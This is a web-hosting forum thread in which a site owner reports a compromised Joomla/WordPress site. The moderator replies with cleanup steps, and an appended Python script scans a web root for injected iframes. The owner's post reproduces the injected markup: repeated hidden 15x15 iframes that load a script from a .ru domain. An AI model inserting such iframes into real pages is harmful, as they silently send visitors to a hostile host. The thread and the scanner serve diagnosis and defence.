Web Hosting Forum | Lunarpages


Author Topic: url redirection to ladygaga site from googlesearch  (Read 7587 times)
VinhDucanh
« on: November 06, 2012, 01:33:13 AM »


My sites have been hacked? At http:/www.lunarvault.com and all subdomains. This just started today. All sites have a bunch of small squares at the top, above the logo.

Google posts: http://productforums.google.com/forum/#!topic/webmasters/3g39NhBncl0

How could this happen? A security hole in Joomla and WordPress?

Firebug shows this:

<iframe width="15" scrolling="auto" height="15" frameborder="no" align="middle" src="http://resettingsubtraction.ru/pittancebrass.cgi?8">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html class="wf-quaraweb1quaraweb2-n4-active wf-pillgothic600mg1pillgothic600mg2-n3-active wf-pillgothic600mg1pillgothic600mg2-i3-active wf-pillgothic600mg1pillgothic600mg2-n4-active wf-pillgothic600mg1pillgothic600mg2-i4-active wf-pillgothic600mg1pillgothic600mg2-n7-active wf-pillgothic600mg1pillgothic600mg2-i7-active wf-pillgothic600mg1pillgothic600mg2-n8-active wf-pillgothic600mg1pillgothic600mg2-i8-active wf-adriannaextended1adriannaextended2-n3-active wf-adriannaextended1adriannaextended2-i3-active wf-prentonultracondensed1prentonultracondensed2-n3-active wf-prentonultracondensed1prentonultracondensed2-n4-active wf-active" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/1999/xhtml" style="height: 100%;">
<head>
<body id="ctl00_body" data-twttr-rendered="true" style="position: relative; min-height: 100%; top: 0px;">
</html>
</iframe>
<script type="text/javascript" src="/media/system/js/core.js">
<iframe width="15" scrolling="auto" height="15" frameborder="no" align="middle" src="http://resettingsubtraction.ru/pittancebrass.cgi?8">
<script type="text/javascript" src="/media/system/js/mootools-more.js">
<iframe width="15" scrolling="auto" height="15" frameborder="no" align="middle" src="http://resettingsubtraction.ru/pittancebrass.cgi?8">
<script type="text/javascript" src="/plugins/system/rokbox/rokbox.js">
<iframe width="15" scrolling="auto" height="15" frameborder="no" align="middle" src="http://resettingsubtraction.ru/pittancebrass.cgi?8">
<script type="text/javascript" src="/plugins/system/rokbox/themes/dark/rokbox-config.js">
<iframe width="15" scrolling="auto" height="15" frameborder="no" align="middle" src="http://resettingsubtraction.ru/pittancebrass.cgi?8">
<script type="text/javascript" src="/templates/gantry/js/rokmediaqueries.js">
<iframe width="15" scrolling="auto" height="15" frameborder="no" align="middle" src="http://resettingsubtraction.ru/pittancebrass.cgi?8">
<script type="text/javascript" src="/templates/gantry/js/load-transition.js">
<iframe width="15" scrolling="auto" height="15" frameborder="no" align="middle" src="http://resettingsubtraction.ru/pittancebrass.cgi?8">
<script type="text/javascript" src="/modules/mod_roknavmenu/themes/fusion/js/fusion.js">
<iframe width="15" scrolling="auto" height="15" frameborder="no" align="middle" src="http://resettingsubtraction.ru/pittancebrass.cgi?8">
<script type="text/javascript" src="/media/system/js/validate.js">
<iframe width="15" scrolling="auto" height="15" frameborder="no" align="middle" src="http://resettingsubtraction.ru/pittancebrass.cgi?8">
<script type="text/javascript" src="/modules/mod_otlightboxlogin/assets/js/otscript.js">
<iframe width="15" scrolling="auto" height="15" frameborder="no" align="middle" src="http://resettingsubtraction.ru/pittancebrass.cgi?8">
<script type="text/javascript">
<script type="text/javascript">
<script src="/modules/mod_thick_rss/includes/smoothbox.js" type="text/javascript">
<iframe width="15" scrolling="auto" height="15" frameborder="no" align="middle" src="http://resettingsubtraction.ru/pittancebrass.cgi?8">


MrPhil
Senior Moderator
« Reply #1 on: November 06, 2012, 05:56:43 AM »

All those iframes look suspicious, especially as they go to a Russian site. Do you have a backup, or otherwise know what's supposed to be in the code? I'm sure you can take out all the "iframe" stuff. They're probably the cause of those little boxes.

Make sure you're at the latest version for all your software. On the chance that an access password has been stolen, first scan your PC (used to access your site) for spyware and viruses. Once it's clean, change every password -- FTP, host account access, applications, databases. And of course, clean out your files, getting rid of any file you can't account for, and investigating recently updated files for hacker-added material like those iframes. It would help if you have known good backups, or at least know what's supposed to be in a given file (such as, you wrote it yourself). Worst case, you could wipe everything clean and restore from the last backup from before the trouble started. If you need to use LP's backup, be aware that it costs ($75, I think) and they only keep a backup around for a few days, so don't delay.
-= From the ashes shall rise a sooty tern =-
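
One way to carry out the "investigating recently updated files for hacker-added material like those iframes" step from the reply above. This is an added example, not part of either post: it walks a web root, flags tiny iframes that load from a host you do not own, and notes whether the file changed recently. The host names, the 20-pixel threshold, the extension list and the sample files are all constructed assumptions.

```python
import os, re, tempfile, time
from urllib.parse import urlparse
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*["']?([^"'\s>]+)""")
SCAN_EXT = {".php", ".html", ".htm", ".js", ".tpl", ".inc"}  # assumed list

def suspicious_iframes(text, own_hosts, max_px=20):
    """Return the src of every tiny iframe that loads from a host we don't own."""
    hits = []
    for tag in IFRAME_RE.findall(text):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
        host = (urlparse(attrs.get("src", "")).hostname or "").lower()
        if not host or host in own_hosts:
            continue  # relative or same-site frame
        dims = (attrs.get("width", ""), attrs.get("height", ""))
        if any(d.rstrip("px").isdigit() and int(d.rstrip("px")) <= max_px for d in dims):
            hits.append(attrs["src"])
    return hits

def scan_tree(root, own_hosts, recent_days=7):
    """Map each infected file (path relative to root) to (hits, modified_recently)."""
    cutoff = time.time() - recent_days * 86400
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCAN_EXT:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = suspicious_iframes(fh.read(), own_hosts)
            if hits:
                recent = os.path.getmtime(path) >= cutoff
                findings[os.path.relpath(path, root)] = (hits, recent)
    return findings

def demo():
    """Scan a constructed web root: one injected template, one legitimate embed."""
    samples = {
        "index.php": '<script src="/media/system/js/core.js"></script>\n<iframe width="15" '
                     'height="15" src="http://injected.example/x.cgi?8"></iframe>\n',
        "video.html": '<iframe width="560" height="315" '
                      'src="https://video.example/embed/1"></iframe>\n',
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root, own_hosts={"www.mysite.example"})

if __name__ == "__main__": print(demo())
```

A file flagged here but not modified recently is still worth checking against a known good backup, since modification times can be reset.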